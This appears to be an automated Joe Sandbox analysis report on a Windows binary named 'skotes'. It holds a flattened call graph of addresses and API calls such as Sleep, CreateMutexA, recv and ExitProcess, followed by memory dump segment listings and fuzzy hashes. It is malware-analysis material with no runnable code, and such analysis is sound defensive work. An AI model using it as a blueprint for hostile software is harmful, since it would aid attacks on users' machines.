__floor_pentium4 9784->9787 9785->9787 9790 b8cf6b 9785->9790 9787->9776 9788 b8c4fd __Xtime_diff_to_millis2 9788->9787 9789 b8cf6b _xtime_get GetSystemTimePreciseAsFileTime 9788->9789 9789->9788 9791 b8cf7a 9790->9791 9793 b8cf87 __aulldvrm 9790->9793 9791->9793 9794 b8cf44 9791->9794 9793->9788 9797 b8cbea 9794->9797 9798 b8cbfb GetSystemTimePreciseAsFileTime 9797->9798 9800 b8cc07 9797->9800 9798->9800 9800->9793 9802 b8bb9c 9801->9802 9803 b8bba4 __Xtime_diff_to_millis2 __floor_pentium4 9802->9803 9804 b8cf6b _xtime_get GetSystemTimePreciseAsFileTime 9802->9804 9803->9779 9805 b8bbcf __Xtime_diff_to_millis2 9804->9805 9805->9803 9806 b8cf6b _xtime_get GetSystemTimePreciseAsFileTime 9805->9806 9806->9803 9810 b72ae0 9807->9810 9809 b8c2ae std::_Throw_future_error 9817 b8bedf 9810->9817 9812 b72af4 __dosmaperr 9812->9809 9820 baa671 9812->9820 9831 b8cc31 9817->9831 9821 baa67b __dosmaperr __freea 9820->9821 9822 ba6ccc 9821->9822 9823 ba8bec __cftof 3 API calls 9821->9823 9825 ba8bec 9822->9825 9824 baa72d 9823->9824 9826 ba8bf1 __cftof 9825->9826 9827 ba8bfc ___std_exception_copy 9826->9827 9835 bad634 9826->9835 9849 ba65ed 9827->9849 9832 b8cc3f InitOnceExecuteOnce 9831->9832 9834 b8bef2 9831->9834 9832->9834 9834->9812 9837 bad640 __cftof __dosmaperr 9835->9837 9836 bad69c __dosmaperr ___std_exception_copy 9836->9827 9837->9836 9838 bad81b __cftof 9837->9838 9839 bad726 9837->9839 9840 bad751 __cftof 9837->9840 9841 ba65ed __cftof 3 API calls 9838->9841 9839->9840 9852 bad62b 9839->9852 9840->9836 9844 baa671 __cftof 3 API calls 9840->9844 9847 bad7a5 9840->9847 9843 bad82e 9841->9843 9844->9847 9846 bad62b __cftof 3 API calls 9846->9840 9847->9836 9848 baa671 __cftof 3 API calls 9847->9848 9848->9836 9850 ba64c7 __cftof 3 API calls 9849->9850 9851 ba65fe 9850->9851 9853 baa671 __cftof 3 API calls 9852->9853 9854 bad630 9853->9854 9854->9846 9858 b8b5d6 9855->9858 9857 b72472 9860 b8b5f1 std::_Throw_future_error 9858->9860 9859 ba8bec __cftof 3 API calls 9861 b8b69f 9859->9861 9860->9859 9862 b8b658 __cftof __floor_pentium4 9860->9862 9862->9857 10337 b755f0 10338 b75610 10337->10338 10339 b722c0 3 API calls 10338->10339 10340 b75710 __floor_pentium4 10338->10340 10339->10338 10341 b743f0 10342 b8bedf InitOnceExecuteOnce 10341->10342 10343 b7440a 10342->10343 10344 b74411 10343->10344 10345 ba6cbb 3 API calls 10343->10345 10346 b74424 10345->10346 10464 b72170 10467 b8c6fc 10464->10467 10466 b7217a 10468 b8c70c 10467->10468 10469 b8c724 10467->10469 10468->10469 10471 b8cfbe 10468->10471 10469->10466 10472 b8ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10471->10472 10473 b8cfd0 10472->10473 10473->10468 10474 b73970 10475 b8c68b __Mtx_init_in_situ 2 API calls 10474->10475 10476 b739a7 10475->10476 10477 b8c68b __Mtx_init_in_situ 2 API calls 10476->10477 10478 b739e6 10477->10478 10264 b7cc79 10266 b7cc84 shared_ptr 10264->10266 10265 b7ccda shared_ptr __floor_pentium4 10266->10265 10267 b75c10 3 API calls 10266->10267 10268 b7ce9d 10267->10268 10270 b7ca70 10268->10270 10271 b7cadd 10270->10271 10272 b75c10 3 API calls 10271->10272 10279 b7cc87 10271->10279 10274 b7ccf9 10272->10274 10273 b7ccda shared_ptr __floor_pentium4 10280 b79030 10274->10280 10276 b75c10 3 API calls 10277 b7ce9d 10276->10277 10278 b7ca70 3 API calls 10277->10278 10279->10273 10279->10276 10281 b79080 10280->10281 10282 b75c10 3 API calls 10281->10282 10283 b7909a shared_ptr __floor_pentium4 10282->10283 10283->10279 9863 b79ab8 9865 b79acc 9863->9865 9866 b79b08 9865->9866 9867 b7a917 9866->9867 9869 b79b4b shared_ptr 9866->9869 9868 b7a953 Sleep CreateMutexA 9867->9868 9873 b7a98e 9868->9873 9871 b79b59 9869->9871 9880 b75c10 9869->9880 9872 b79b7c 9898 b78b30 9872->9898 9875 b79b8d 9876 b75c10 3 API calls 9875->9876 9877 b79cb1 9876->9877 9878 b78b30 3 API calls 9877->9878 9879 b79cc2 9878->9879 9881 b75c54 9880->9881 9908 b74b30 9881->9908 9883 b75d17 shared_ptr __floor_pentium4 9883->9872 9884 b75c7b shared_ptr __cftof 9884->9883 9885 b75c10 3 API calls 9884->9885 9886 b766ac 9885->9886 9887 b75c10 3 API calls 9886->9887 9888 b766b1 9887->9888 9912 b722c0 9888->9912 9890 b766c9 shared_ptr 9891 b75c10 3 API calls 9890->9891 9892 b7673d 9891->9892 9893 b722c0 3 API calls 9892->9893 9895 b76757 shared_ptr 9893->9895 9894 b75c10 3 API calls 9894->9895 9895->9894 9896 b722c0 3 API calls 9895->9896 9897 b76852 shared_ptr __floor_pentium4 9895->9897 9896->9895 9897->9872 9899 b78b7c 9898->9899 9900 b75c10 3 API calls 9899->9900 9902 b78b97 shared_ptr 9900->9902 9901 b78d01 shared_ptr __floor_pentium4 9901->9875 9902->9901 9903 b75c10 3 API calls 9902->9903 9904 b78d9a shared_ptr 9903->9904 9905 b78e7e shared_ptr __floor_pentium4 9904->9905 9906 b75c10 3 API calls 9904->9906 9905->9875 9907 b78f1a shared_ptr __floor_pentium4 9906->9907 9907->9875 9910 b74ce5 9908->9910 9911 b74b92 9908->9911 9910->9884 9911->9910 9915 ba6da6 9911->9915 9993 b72280 9912->9993 9916 ba6dc2 9915->9916 9917 ba6db4 9915->9917 9916->9911 9920 ba6d19 9917->9920 9925 ba690a 9920->9925 9924 ba6d3d 9924->9911 9926 ba692a 9925->9926 9927 ba6921 9925->9927 9926->9927 9928 baa671 __cftof 3 API calls 9926->9928 9933 ba6d52 9927->9933 9929 ba694a 9928->9929 9939 bab5fb 9929->9939 9934 ba6d8f 9933->9934 9935 ba6d5f 9933->9935 9985 bab67d 9934->9985 9938 ba6d6e 9935->9938 9980 bab6a1 9935->9980 9938->9924 9940 bab60e 9939->9940 9941 ba6960 9939->9941 9940->9941 9947 baf5ab 9940->9947 9943 bab628 9941->9943 9944 bab63b 9943->9944 9945 bab650 9943->9945 9944->9945 9954 bae6b1 9944->9954 9945->9927 9948 baf5b7 __dosmaperr 9947->9948 9949 baa671 __cftof 3 API calls 9948->9949 9951 baf5c0 __cftof __dosmaperr 9949->9951 9950 baf606 9950->9941 9951->9950 9952 ba8bec __cftof 3 API calls 9951->9952 9953 baf62b 9952->9953 9955 baa671 __cftof 3 API calls 9954->9955 9956 bae6bb 9955->9956 9959 bae5c9 9956->9959 9958 bae6c1 9958->9945 9962 bae5d5 __cftof __dosmaperr __freea 9959->9962 9960 bae5f6 9960->9958 9961 ba8bec __cftof 3 API calls 9963 bae668 9961->9963 9962->9960 9962->9961 9964 bae6a4 9963->9964 9968 baa72e 9963->9968 9964->9958 9969 baa739 __dosmaperr __freea 9968->9969 9970 ba8bec __cftof GetPEB ExitProcess GetPEB 9969->9970 9972 baa7be 9969->9972 9971 baa7c7 9970->9971 9973 bae4b0 9972->9973 9974 bae5c9 __cftof GetPEB ExitProcess GetPEB 9973->9974 9975 bae4c3 9974->9975 9976 bae259 __cftof GetPEB ExitProcess GetPEB 9975->9976 9977 bae4cb __cftof 9976->9977 9978 bae6c4 __cftof GetPEB ExitProcess GetPEB 9977->9978 9979 bae4dc __cftof __dosmaperr __freea 9977->9979 9978->9979 9979->9964 9981 ba690a __cftof 3 API calls 9980->9981 9982 bab6be 9981->9982 9984 bab6ce __floor_pentium4 9982->9984 9990 baf1bf 9982->9990 9984->9938 9986 baa671 __cftof 3 API calls 9985->9986 9987 bab688 9986->9987 9988 bab5fb __cftof 3 API calls 9987->9988 9989 bab698 9988->9989 9989->9938 9991 ba690a __cftof 3 API calls 9990->9991 9992 baf1df __cftof __freea __floor_pentium4 9991->9992 9992->9984 9994 b72296 9993->9994 9997 ba87f8 9994->9997 10000 ba7609 9997->10000 9999 b722a4 9999->9890 10001 ba7649 10000->10001 10005 ba7631 __dosmaperr ___std_exception_copy __floor_pentium4 10000->10005 10002 ba690a __cftof 3 API calls 10001->10002 10001->10005 10003 ba7661 10002->10003 10006 ba7bc4 10003->10006 10005->9999 10007 ba7bd5 10006->10007 10008 ba7be4 __dosmaperr ___std_exception_copy 10007->10008 10013 ba8168 10007->10013 10018 ba7dc2 10007->10018 10023 ba7de8 10007->10023 10033 ba7f36 10007->10033 10008->10005 10014 ba8178 10013->10014 10015 ba8171 10013->10015 10014->10007 10042 ba7b50 10015->10042 10017 ba8177 10017->10007 10019 ba7dcb 10018->10019 10020 ba7dd2 10018->10020 10021 ba7b50 3 API calls 10019->10021 10020->10007 10022 ba7dd1 10021->10022 10022->10007 10024 ba7e09 __dosmaperr ___std_exception_copy 10023->10024 10025 ba7def 10023->10025 10024->10007 10025->10024 10026 ba7f69 10025->10026 10028 ba7fa2 10025->10028 10031 ba7f77 10025->10031 10026->10031 10032 ba7f8b 10026->10032 10054 ba8241 10026->10054 10028->10032 10050 ba8390 10028->10050 10031->10032 10058 ba86ea 10031->10058 10032->10007 10034 ba7f4f 10033->10034 10035 ba7f69 10033->10035 10034->10035 10037 ba7fa2 10034->10037 10040 ba7f77 10034->10040 10036 ba8241 3 API calls 10035->10036 10035->10040 10041 ba7f8b 10035->10041 10036->10040 10038 ba8390 3 API calls 10037->10038 10037->10041 10038->10040 10039 ba86ea 3 API calls 10039->10041 10040->10039 10040->10041 10041->10007 10043 ba7b62 __dosmaperr 10042->10043 10046 ba8ab6 10043->10046 10045 ba7b85 __dosmaperr 10045->10017 10047 ba8ad1 10046->10047 10048 ba8868 GetPEB ExitProcess GetPEB 10047->10048 10049 ba8adb 10048->10049 10049->10045 10051 ba83ab 10050->10051 10052 ba83dd 10051->10052 10062 bac88e 10051->10062 10052->10031 10055 ba825a 10054->10055 10065 bad3c8 10055->10065 10057 ba830d 10057->10031 10057->10057 10059 ba875d __floor_pentium4 10058->10059 10061 ba8707 10058->10061 10059->10032 10060 bac88e __cftof 3 API calls 10060->10061 10061->10059 10061->10060 10063 bac733 __cftof GetPEB ExitProcess GetPEB 10062->10063 10064 bac8a6 10063->10064 10064->10052 10066 bad3d8 __dosmaperr ___std_exception_copy 10065->10066 10067 bad3ee 10065->10067 10066->10057 10067->10066 10068 bad485 10067->10068 10069 bad48a 10067->10069 10071 bad4ae 10068->10071 10072 bad4e4 10068->10072 10070 bacbdf GetPEB ExitProcess GetPEB 10069->10070 10070->10066 10073 bad4cc 10071->10073 10074 bad4b3 10071->10074 10075 bacef8 GetPEB ExitProcess GetPEB 10072->10075 10077 bad0e2 GetPEB ExitProcess GetPEB 10073->10077 10076 bad23e GetPEB ExitProcess GetPEB 10074->10076 10075->10066 10076->10066 10077->10066 10308 b79ba5 10309 b79ba7 10308->10309 10310 b75c10 3 API calls 10309->10310 10311 b79cb1 10310->10311 10312 b78b30 3 API calls 10311->10312 10313 b79cc2 10312->10313 9722 ba6629 9725 ba64c7 9722->9725 9726 ba64d5 __cftof 9725->9726 9727 ba6520 9726->9727 9730 ba652b 9726->9730 9729 ba652a 9736 baa302 GetPEB 9730->9736 9732 ba6535 9733 ba654a __cftof 9732->9733 9734 ba653a GetPEB 9732->9734 9735 ba6562 ExitProcess 9733->9735 9734->9733 9737 baa31c __cftof 9736->9737 9737->9732 10078 b720a0 10081 b8c68b 10078->10081 10080 b720ac 10084 b8c3d5 10081->10084 10083 b8c69b 10083->10080 10085 b8c3eb 10084->10085 10086 b8c3e1 10084->10086 10085->10083 10087 b8c3be 10086->10087 10089 b8c39e 10086->10089 10097 b8cd0a 10087->10097 10089->10085 10093 b8ccd5 10089->10093 10090 b8c3d0 10090->10083 10094 b8cce3 InitializeCriticalSectionEx 10093->10094 10096 b8c3b7 10093->10096 10094->10096 10096->10083 10098 b8cd1f RtlInitializeConditionVariable 10097->10098 10098->10090 10347 b73fe0 10348 b74022 10347->10348 10349 b740d2 10348->10349 10350 b7408c 10348->10350 10353 b74035 __floor_pentium4 10348->10353 10360 b73ee0 10349->10360 10354 b735e0 10350->10354 10355 b73616 10354->10355 10359 b7364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 10355->10359 10366 b72ce0 10355->10366 10357 b7369e 10357->10359 10375 b72c00 10357->10375 10359->10353 10361 b73f1e 10360->10361 10362 b73f48 10360->10362 10361->10353 10363 b73f58 10362->10363 10364 b72c00 3 API calls 10362->10364 10363->10353 10365 b73f7f 10364->10365 10365->10353 10367 b72d1d 10366->10367 10368 b8bedf InitOnceExecuteOnce 10367->10368 10369 b72d46 10368->10369 10370 b72d88 10369->10370 10371 b72d51 __floor_pentium4 10369->10371 10382 b8bef7 10369->10382 10373 b72440 3 API calls 10370->10373 10371->10357 10374 b72d9b 10373->10374 10374->10357 10376 b72c0e 10375->10376 10395 b8b847 10376->10395 10378 b72c42 10379 b72c49 10378->10379 10401 b72c80 10378->10401 10379->10359 10381 b72c58 std::_Throw_future_error 10383 b8bf03 std::_Throw_future_error 10382->10383 10384 b8bf6a 10383->10384 10385 b8bf73 10383->10385 10389 b8be7f 10384->10389 10387 b72ae0 4 API calls 10385->10387 10388 b8bf6f 10387->10388 10388->10370 10390 b8cc31 InitOnceExecuteOnce 10389->10390 10391 b8be97 10390->10391 10392 b8be9e 10391->10392 10393 ba6cbb 3 API calls 10391->10393 10392->10388 10394 b8bea7 10393->10394 10394->10388 10396 b8b854 10395->10396 10400 b8b873 Concurrency::details::_Reschedule_chore 10395->10400 10404 b8cb77 10396->10404 10398 b8b864 10398->10400 10406 b8b81e 10398->10406 10400->10378 10402 b8b7fb TpReleaseWork 10401->10402 10403 b72cb2 shared_ptr 10402->10403 10403->10381 10405 b8cb92 CreateThreadpoolWork 10404->10405 10405->10398 10407 b8b827 Concurrency::details::_Reschedule_chore 10406->10407 10410 b8cdcc 10407->10410 10409 b8b841 10409->10400 10411 b8cde1 TpPostWork 10410->10411 10411->10409 10431 b74120 10432 b7416a 10431->10432 10433 b741b2 Concurrency::details::_ContextCallback::_CallInContext __floor_pentium4 10432->10433 10434 b73ee0 3 API calls 10432->10434 10434->10433 10099 b75cad 10101 b75caf shared_ptr __cftof 10099->10101 10100 b75d17 shared_ptr __floor_pentium4 10101->10100 10101->10101 10102 b75c10 3 API calls 10101->10102 10103 b766ac 10102->10103 10104 b75c10 3 API calls 10103->10104 10105 b766b1 10104->10105 10106 b722c0 3 API calls 10105->10106 10107 b766c9 shared_ptr 10106->10107 10108 b75c10 3 API calls 10107->10108 10109 b7673d 10108->10109 10110 b722c0 3 API calls 10109->10110 10112 b76757 shared_ptr 10110->10112 10111 b75c10 3 API calls 10111->10112 10112->10111 10113 b722c0 3 API calls 10112->10113 10114 b76852 shared_ptr __floor_pentium4 10112->10114 10113->10112 9717 b7a856 9718 b7a870 9717->9718 9721 b7a892 shared_ptr 9717->9721 9719 b7a953 Sleep CreateMutexA 9718->9719 9718->9721 9720 b7a98e 9719->9720 10319 b72b90 10320 b72bce 10319->10320 10323 b8b7fb 10320->10323 10322 b72bdb shared_ptr __floor_pentium4 10324 b8b817 10323->10324 10325 b8b807 10323->10325 10324->10322 10325->10324 10327 b8ca78 10325->10327 10328 b8ca8d TpReleaseWork 10327->10328 10328->10324 10435 b72b10 10436 b72b1c 10435->10436 10437 b72b1a 10435->10437 10438 b8c26a 4 API calls 10436->10438 10439 b72b22 10438->10439 10329 b73f9f 10330 b73fb6 10329->10330 10331 b73fad 10329->10331 10332 b72410 4 API calls 10331->10332 10332->10330 10440 b8d111 10441 b8d122 10440->10441 10442 b8d12a 10441->10442 10444 b8d199 10441->10444 10445 b8d1a7 SleepConditionVariableCS 10444->10445 10447 b8d1c0 10444->10447 10445->10447 10447->10441 10178 b79adc 10181 b79aea shared_ptr 10178->10181 10179 b7a917 10180 b7a953 Sleep CreateMutexA 10179->10180 10185 b7a98e 10180->10185 10181->10179 10183 b79b4b shared_ptr 10181->10183 10182 b79b59 10183->10182 10184 b75c10 3 API calls 10183->10184 10186 b79b7c 10184->10186 10187 b78b30 3 API calls 10186->10187 10188 b79b8d 10187->10188 10189 b75c10 3 API calls 10188->10189 10190 b79cb1 10189->10190 10191 b78b30 3 API calls 10190->10191 10192 b79cc2 10191->10192 10479 b7215a 10480 b8c6fc InitializeCriticalSectionEx 10479->10480 10481 b72164 10480->10481 10284 b73c47 10285 b73c51 10284->10285 10287 b732d0 5 API calls 10285->10287 10288 b73c5f 10285->10288 10286 b73c68 10287->10288 10288->10286 10289 b73810 3 API calls 10288->10289 10290 b73cdb shared_ptr 10289->10290 10482 b79f44 10483 b79f4c shared_ptr 10482->10483 10484 b7a953 Sleep CreateMutexA 10483->10484 10486 b7a01f shared_ptr 10483->10486 10485 b7a98e 10484->10485 10193 b720c0 10194 b8c68b __Mtx_init_in_situ 2 API calls 10193->10194 10195 b720cc 10194->10195 10196 b7e0c0 recv 10197 b7e122 recv 10196->10197 10198 b7e157 recv 10197->10198 10199 b7e191 10198->10199 10200 b7e2b3 __floor_pentium4 10199->10200 10201 b8c6ac GetSystemTimePreciseAsFileTime 10199->10201 10202 b7e2ee 10201->10202 10203 b8c26a 4 API calls 10202->10203 10204 b7e358 10203->10204 10205 b72ec0 10206 b72f06 10205->10206 10207 b72f7e GetCurrentThreadId 10205->10207 10209 b8c6ac GetSystemTimePreciseAsFileTime 10206->10209 10208 b72f94 10207->10208 10225 b72fef 10207->10225 10214 b8c6ac GetSystemTimePreciseAsFileTime 10208->10214 10208->10225 10210 b72f12 10209->10210 10211 b7301e 10210->10211 10215 b72f1d __Mtx_unlock 10210->10215 10212 b8c26a 4 API calls 10211->10212 10213 b73024 10212->10213 10216 b8c26a 4 API calls 10213->10216 10217 b72fb9 10214->10217 10215->10213 10218 b72f6f 10215->10218 10216->10217 10219 b8c26a 4 API calls 10217->10219 10220 b72fc0 __Mtx_unlock 10217->10220 10218->10207 10218->10225 10219->10220 10221 b8c26a 4 API calls 10220->10221 10222 b72fd8 __Cnd_broadcast 10220->10222 10221->10222 10223 b8c26a 4 API calls 10222->10223 10222->10225 10224 b7303c 10223->10224 10226 b8c6ac GetSystemTimePreciseAsFileTime 10224->10226 10235 b73080 shared_ptr __Mtx_unlock 10226->10235 10227 b731c5 10228 b8c26a 4 API calls 10227->10228 10229 b731cb 10228->10229 10230 b8c26a 4 API calls 10229->10230 10231 b731d1 10230->10231 10232 b8c26a 4 API calls 10231->10232 10240 b73193 __Mtx_unlock 10232->10240 10233 b731a7 __floor_pentium4 10234 b8c26a 4 API calls 10236 b731dd 10234->10236 10235->10227 10235->10229 10235->10233 10237 b73132 GetCurrentThreadId 10235->10237 10237->10233 10238 b7313b 10237->10238 10238->10233 10239 b8c6ac GetSystemTimePreciseAsFileTime 10238->10239 10241 b7315f 10239->10241 10240->10233 10240->10234 10241->10227 10241->10231 10241->10240 10242 b8bd4c GetSystemTimePreciseAsFileTime 10241->10242 10242->10241 10252 b72e00 10253 b72e28 10252->10253 10254 b8c68b __Mtx_init_in_situ 2 API calls 10253->10254 10255 b72e33 10254->10255 10333 b78980 10335 b789d8 shared_ptr 10333->10335 10336 b78aea 10333->10336 10334 b75c10 3 API calls 10334->10335 10335->10334 10335->10336 10120 b73c8e 10121 b73c98 10120->10121 10123 b73ca5 10121->10123 10128 b72410 10121->10128 10124 b73810 3 API calls 10123->10124 10125 b73ccf 10124->10125 10126 b73810 3 API calls 10125->10126 10127 b73cdb shared_ptr 10126->10127 10129 b72424 10128->10129 10132 b8b52d 10129->10132 10140 ba3aed 10132->10140 10134 b8b5a5 ___std_exception_copy 10147 b8b1ad 10134->10147 10135 b8b598 10143 b8af56 10135->10143 10139 b7242a 10139->10123 10151 ba4f29 10140->10151 10142 b8b555 10142->10134 10142->10135 10142->10139 10144 b8af9f ___std_exception_copy 10143->10144 10146 b8afb2 shared_ptr 10144->10146 10157 b8b39f 10144->10157 10146->10139 10148 b8b1d8 10147->10148 10150 b8b1e1 shared_ptr 10147->10150 10149 b8b39f 4 API calls 10148->10149 10149->10150 10150->10139 10152 ba4f2e __cftof 10151->10152 10152->10142 10153 bad634 __cftof 3 API calls 10152->10153 10156 ba8bfc ___std_exception_copy 10152->10156 10153->10156 10154 ba65ed __cftof 3 API calls 10155 ba8c2f 10154->10155 10156->10154 10158 b8bedf InitOnceExecuteOnce 10157->10158 10159 b8b3e1 10158->10159 10160 b8b3e8 10159->10160 10168 ba6cbb 10159->10168 10160->10146 10169 ba6cc7 __dosmaperr 10168->10169 10170 baa671 __cftof 3 API calls 10169->10170 10173 ba6ccc 10170->10173 10171 ba8bec __cftof 3 API calls 10172 ba6cf6 10171->10172 10173->10171 10291 ba6a44 10292 ba6a5c 10291->10292 10293 ba6a52 10291->10293 10296 ba698d 10292->10296 10295 ba6a76 __freea 10297 ba690a __cftof 3 API calls 10296->10297 10298 ba699f 10297->10298 10298->10295 10243 b8d0c7 10244 b8d0d7 10243->10244 10245 b8d17f 10244->10245 10246 b8d17b RtlWakeAllConditionVariable 10244->10246

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 351 ba652b-ba6538 call baa302 354 ba655a-ba656c call ba656d ExitProcess 351->354 355 ba653a-ba6548 GetPEB 351->355 355->354 356 ba654a-ba6559 355->356 356->354
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,?,00BA652A,?,?,?,?,?,00BA7661), ref: 00BA6567
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                                                          • Opcode ID: fe350294a5a365d886a593c2f41c44934a02db9152ded20ecf3c456325a421e8
                                                                                                                                                                                                                                          • Instruction ID: 3a95122e9c3888f876228b58c5cda5d607dae2bb706aed0f4238773ef6dbad6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe350294a5a365d886a593c2f41c44934a02db9152ded20ecf3c456325a421e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAE08C3054414CBECF26BB18D809E4C3BA9EB62759F088850FD1846226CB35EE81CAA0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
